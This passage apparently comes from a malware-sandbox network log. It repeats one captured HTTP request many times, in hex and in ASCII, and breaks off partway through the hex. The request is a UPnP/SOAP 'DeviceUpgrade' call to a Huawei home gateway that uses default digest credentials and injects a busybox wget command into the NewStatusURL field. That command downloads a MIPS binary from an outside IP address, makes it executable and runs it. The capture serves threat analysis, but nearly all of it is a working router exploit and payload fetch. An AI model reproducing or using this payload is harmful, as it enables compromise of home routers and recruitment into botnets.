huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 